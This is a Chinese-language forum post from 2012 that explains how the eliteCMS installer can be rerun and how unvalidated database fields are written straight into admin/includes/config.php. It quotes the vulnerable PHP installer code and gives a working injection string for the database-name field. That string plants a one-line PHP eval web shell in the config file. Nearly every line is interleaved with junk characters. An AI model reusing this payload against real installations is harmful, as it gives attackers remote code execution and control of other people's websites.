eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装$ a0 f- ?( X1 y. f Y; m. m7 b: @9 a
b( o8 Z; R: Y9 A6 C' I3 Y- S另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
X; K; e% _0 r" b3 H# I我们来看代码:
, t: } \. J+ _8 P K" _& P # m7 t5 E4 Q5 g
...' r, T9 t. }, a( I
elseif ($_GET['step'] == "4") {
1 f# H8 n; B4 h9 D& {5 h: s $file = "../admin/includes/config.php";
q; s2 A! h% e# H $write = "<?php\n";0 v+ B% ^1 Z5 }5 p. B0 |" N# P
$write .= "/**\n";
8 s3 r! m9 V) S7 O" t1 M $write .= "*\n";
* F" p1 \9 v5 r) r $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";- V9 ? s! j: V/ }6 H" [
...略...
; Y+ l. Q5 K+ V6 I $write .= "*\n";
9 ~& o& I! \$ Y" A( B $write .= "*/\n";8 `/ C9 @9 S& h& W! O6 Z' w; N* r
$write .= "\n";; N8 ^" {3 R# N& d/ Z- z
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";+ h/ G) f! H9 [( n- h
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";' _, _* ]* R' K. n- _
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
V# C- g1 u, g $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
. T' H b3 t0 a$ e $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
G8 R2 \% c" E $write .= "if (!\$connection) {\n";
, G7 \! S) q K- Q$ E $write .= " die(\"Database connection failed\" .mysql_error());\n";9 s- x6 J1 Q6 A6 G7 u6 q& h* V- X
$write .= " \n";
% P* u7 o3 Q; J# B $write .= "} \n";3 b3 F3 o, v" v+ _, H
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";" g! w8 q {8 k: ?
$write .= "if (!\$db_select) {\n";2 {$ n, O; w6 m$ T
$write .= " die(\"Database select failed\" .mysql_error());\n";0 _! y' J4 X7 L0 I0 a
$write .= " \n";, C% ~8 Q- J7 ^$ H) j/ s
$write .= "} \n";9 p: i" M! o# `% W) {& ~ x
$write .= "?>\n";$ f, V! M& E2 C% V( y
. ~5 L; Y! d2 v+ V/ e. B3 A $writer = fopen($file, 'w');* S0 b' i' q3 ?. w$ z3 ]7 `
...
0 L- s1 C6 D, t, h ( M, q8 P; ^5 k8 A7 c* @9 y' V
在看代码:
% K, ]3 Z b+ X/ E0 k+ }% C % U( G5 @4 b; `3 M: p5 }- A
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];# x7 d o6 a' q8 i$ P- h1 B
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
3 _: r' A, c4 Y: t$_SESSION['DB_USER'] = $_POST['DB_USER'];
+ i. ]: ~5 _3 G8 T" }7 u9 Y9 w4 {0 S$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
# Z* B5 _8 Q3 I) V* k 0 ?. M; B$ k0 K
取值未作任何验证- J5 F4 o: }: f' _% g9 `* ~
如果将数据库名POST数据:, B! \& S, j! ]+ J# Y$ Y
, @* N( q; `6 M& `7 A
"?><?php eval($_POST[c]);?><?php
/ ^+ x) B' X5 v! \( d: k7 |7 j" ? ) q/ o5 V1 j( U
将导致一句话后门写入/admin/includes/config.php
$ p, {, g$ r4 |2 c |
发表于 2012-11-18 13:59:27
收藏
支持
反对